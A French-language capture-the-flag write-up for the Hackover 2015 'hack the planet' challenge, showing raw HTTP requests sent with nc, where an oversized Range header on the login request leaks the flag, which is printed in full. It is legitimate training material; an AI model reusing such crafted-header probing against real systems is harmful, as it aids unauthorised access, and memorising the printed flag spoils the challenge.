Description

Hacking a site is basic task for any skilled hacker.
Methods range from brute force to talking to people.
No matter which method you choose, don’t forget to use head.

Resolution

Une identification, une image de background de hacker, et … une jolie description.

A chaque tentative infructueuse d’identification, une image de « fail » nous est renvoyée.

Parlons un peu plus de la description, « don’t forget to use HEAD » , allons voir 😉

$ nc hack-the-planet.hackover.h4q.it 80
HEAD /login HTTP/1.0
host: hack-the-planet.hackover.h4q.it

HTTP/1.0 206 Partial Content
X-Hackers-Kate-Libby: make it my first-born!
Date: Fri, 16 Oct 2015 18:04:18 GMT
Content-Type: text/plain; charset=utf-8

Un header X-Hackers qui ne nous parle pas et … comment ça une réponse « Partial Content » ?!

Comme de par hasard, la description parle de « Methods RANGE from brute force… ».

Allez, on essaye de toucher au range en utilisant une plage un peu plus grande que le poids de l’image de fail habituelle :

$ nc hack-the-planet.hackover.h4q.it 80
POST /login HTTP/1.0
host: hack-the-planet.hackover.h4q.it
Range: bytes=9046-10000

HTTP/1.0 416 Requested Range Not Satisfiable
Content-Type: text/plain; charset=utf-8
Last-Modified: Fri, 16 Oct 2015 18:16:36 GMT
X-Content-Type-Options: nosniff
Date: Fri, 16 Oct 2015 18:16:36 GMT
Content-Length: 55

invalid range
hackover15{Thepoolontheroofnusthavealeak}

Gagné !

Le flag est hackover15{Thepoolontheroofnusthavealeak}